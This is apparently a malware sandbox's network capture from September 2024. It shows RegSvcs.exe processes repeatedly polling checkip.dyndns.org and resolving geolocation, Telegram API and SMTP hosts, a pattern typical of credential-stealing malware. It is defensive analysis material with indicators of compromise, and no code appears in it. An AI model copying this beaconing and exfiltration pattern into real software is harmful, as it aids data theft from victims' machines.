                                                                    Sep 25, 2024 15:34:34.948061943 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.948424101 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:34.948436975 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:34.993401051 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.408077955 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.413256884 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:35.413335085 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.546947002 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.547041893 CEST44349734188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:35.547095060 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:35.548012018 CEST49734443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:35.551122904 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.552189112 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.556924105 CEST8049733193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:35.557468891 CEST4973380192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.561271906 CEST8049735193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:35.561443090 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.561443090 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:35.566270113 CEST8049735193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:36.024744987 CEST8049735193.122.130.0192.168.2.5
                                                                    Sep 25, 2024 15:34:36.026382923 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.026415110 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.026484966 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.026770115 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.026783943 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.071420908 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.482688904 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.484467030 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.484492064 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.632805109 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.632910013 CEST44349736188.114.97.3192.168.2.5
                                                                    Sep 25, 2024 15:34:36.632971048 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.633399010 CEST49736443192.168.2.5188.114.97.3
                                                                    Sep 25, 2024 15:34:36.636383057 CEST4973580192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.637316942 CEST4973780192.168.2.5193.122.130.0
                                                                    Sep 25, 2024 15:34:36.641433001 CEST8049735193.122.130.0192.168.2.5
| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
|---|---|---|---|---|
| Sep 25, 2024 15:34:12.536870003 CEST | 61343 | 53 | 192.168.2.5 | 1.1.1.1 |
| Sep 25, 2024 15:34:12.545280933 CEST | 53 | 61343 | 1.1.1.1 | 192.168.2.5 |
| Sep 25, 2024 15:34:13.240186930 CEST | 56348 | 53 | 192.168.2.5 | 1.1.1.1 |
| Sep 25, 2024 15:34:13.248141050 CEST | 53 | 56348 | 1.1.1.1 | 192.168.2.5 |
| Sep 25, 2024 15:34:22.668358088 CEST | 50014 | 53 | 192.168.2.5 | 1.1.1.1 |
| Sep 25, 2024 15:34:22.799654007 CEST | 53 | 50014 | 1.1.1.1 | 192.168.2.5 |
| Sep 25, 2024 15:34:29.530595064 CEST | 53898 | 53 | 192.168.2.5 | 1.1.1.1 |
| Sep 25, 2024 15:34:29.540354013 CEST | 53 | 53898 | 1.1.1.1 | 192.168.2.5 |

| Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|
| Sep 25, 2024 15:34:12.536870003 CEST | 192.168.2.5 | 1.1.1.1 | 0xdb38 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:13.240186930 CEST | 192.168.2.5 | 1.1.1.1 | 0xcf92 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:22.668358088 CEST | 192.168.2.5 | 1.1.1.1 | 0x497c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:29.530595064 CEST | 192.168.2.5 | 1.1.1.1 | 0x6792 | Standard query (0) | us2.smtp.mailhostbox.com | A (IP address) | IN (0x0001) | false |

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
|---|---|---|---|---|---|---|---|---|---|---|
| Sep 25, 2024 15:34:12.545280933 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb38 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
| Sep 25, 2024 15:34:12.545280933 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb38 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:12.545280933 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb38 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:12.545280933 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb38 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:12.545280933 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb38 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:12.545280933 CEST | 1.1.1.1 | 192.168.2.5 | 0xdb38 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:13.248141050 CEST | 1.1.1.1 | 192.168.2.5 | 0xcf92 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:13.248141050 CEST | 1.1.1.1 | 192.168.2.5 | 0xcf92 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:22.799654007 CEST | 1.1.1.1 | 192.168.2.5 | 0x497c | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:29.540354013 CEST | 1.1.1.1 | 192.168.2.5 | 0x6792 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.198.143 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:29.540354013 CEST | 1.1.1.1 | 192.168.2.5 | 0x6792 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.224 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:29.540354013 CEST | 1.1.1.1 | 192.168.2.5 | 0x6792 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.225 | A (IP address) | IN (0x0001) | false |
| Sep 25, 2024 15:34:29.540354013 CEST | 1.1.1.1 | 192.168.2.5 | 0x6792 | No error (0) | us2.smtp.mailhostbox.com | | 208.91.199.223 | A (IP address) | IN (0x0001) | false |
                                                                    • reallyfreegeoip.org
                                                                    • api.telegram.org
                                                                    • checkip.dyndns.org
| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 0 | 192.168.2.5 | 49704 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Timestamp: Sep 25, 2024 15:34:12.586656094 CEST | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
Timestamp: Sep 25, 2024 15:34:13.043016911 CEST | Bytes transferred: 320 | Direction: IN
HTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:12 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 87e83b63c61315f3249a35b816613b3d
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Timestamp: Sep 25, 2024 15:34:13.047588110 CEST | Bytes transferred: 127 | Direction: OUT
GET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
Timestamp: Sep 25, 2024 15:34:13.148109913 CEST | Bytes transferred: 320 | Direction: IN
HTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:13 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 0e7c67361f00fd21856e185fd6d0fa0c
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Timestamp: Sep 25, 2024 15:34:13.919938087 CEST | Bytes transferred: 127 | Direction: OUT
GET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
Timestamp: Sep 25, 2024 15:34:14.020360947 CEST | Bytes transferred: 320 | Direction: IN
HTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:13 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 09949d6832773e2b2d51bb6d8490e2a5
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 1 | 192.168.2.5 | 49707 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Timestamp: Sep 25, 2024 15:34:14.685621977 CEST | Bytes transferred: 127 | Direction: OUT
GET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
Timestamp: Sep 25, 2024 15:34:15.151278973 CEST | Bytes transferred: 320 | Direction: IN
HTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:15 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: cf8e38c8673f9bc113881b082b988138
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 2 | 192.168.2.5 | 49709 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Timestamp: Sep 25, 2024 15:34:15.780987024 CEST | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
Timestamp: Sep 25, 2024 15:34:16.246324062 CEST | Bytes transferred: 320 | Direction: IN
HTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:16 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 8d444e59cc68ea4eb9bc79a64bf54740
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 3 | 192.168.2.5 | 49711 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Timestamp: Sep 25, 2024 15:34:16.887588978 CEST | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
Timestamp: Sep 25, 2024 15:34:17.343688965 CEST | Bytes transferred: 320 | Direction: IN
HTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:17 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 404485e228c9b471f4ca6ffbb97813d2
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


| Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
|---|---|---|---|---|---|---|
| 4 | 192.168.2.5 | 49713 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe |

Timestamp: Sep 25, 2024 15:34:18.052330017 CEST | Bytes transferred: 151 | Direction: OUT
GET / HTTP/1.1
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                    Host: checkip.dyndns.org
                                                                    Connection: Keep-Alive
                                                                    Sep 25, 2024 15:34:18.525022984 CEST320INHTTP/1.1 200 OK
                                                                    Date: Wed, 25 Sep 2024 13:34:18 GMT
                                                                    Content-Type: text/html
                                                                    Content-Length: 103
                                                                    Connection: keep-alive
                                                                    Cache-Control: no-cache
                                                                    Pragma: no-cache
                                                                    X-Request-ID: 5d592331bb4716070e42e098eeb28013
                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49715 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:19.135159969 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:19.612426043 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:19 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 6313c57bda31f24884e24845b54c7056
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49717 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:20.263055086 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:20.725817919 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:20 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: b1545772d4d95aeb29cb74516f39c673
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49719 | 193.122.130.0 | 80 | 6004 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:21.348597050 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:21.814506054 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:21 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: b63a627f0f92aa35eb4f9d16e696291e
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49728 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:31.018636942 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:31.474561930 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:31 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: c9113f6fa16125a0ab7f6f724811cbbc
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 25, 2024 15:34:31.478653908 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 25, 2024 15:34:31.596568108 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:31 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 4741f1ed4f3a36589b9052b7c1f093b5
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>
Sep 25, 2024 15:34:32.305228949 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 25, 2024 15:34:32.405152082 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:32 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 5dda7219ae3fef23507408e1e0226a8f
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49731 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:33.036124945 CEST | 127 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Sep 25, 2024 15:34:33.498054981 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:33 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 5d0c420524685886a115fca9860f305b
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49733 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:34.472502947 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:34.946387053 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:34 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 2ae81f88f3f93c1844e459ac0713d7fe
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49735 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:35.561443090 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:36.024744987 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:35 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: c68bdbf24f8f016fce02a24ec5afe8af
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49737 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:36.642313957 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:37.116503000 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:37 GMT
    Content-Type: text/html
    Content-Length: 103
    Connection: keep-alive
    Cache-Control: no-cache
    Pragma: no-cache
    X-Request-ID: 9f814e9cf86dee37d8164883531765b0
    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.33</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49739 | 193.122.130.0 | 80 | 6488 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 15:34:37.747138023 CEST | 151 | OUT | GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Sep 25, 2024 15:34:38.398482084 CEST | 320 | IN | HTTP/1.1 200 OK
    Date: Wed, 25 Sep 2024 13:34:38 GMT
    Content-Type: text/html
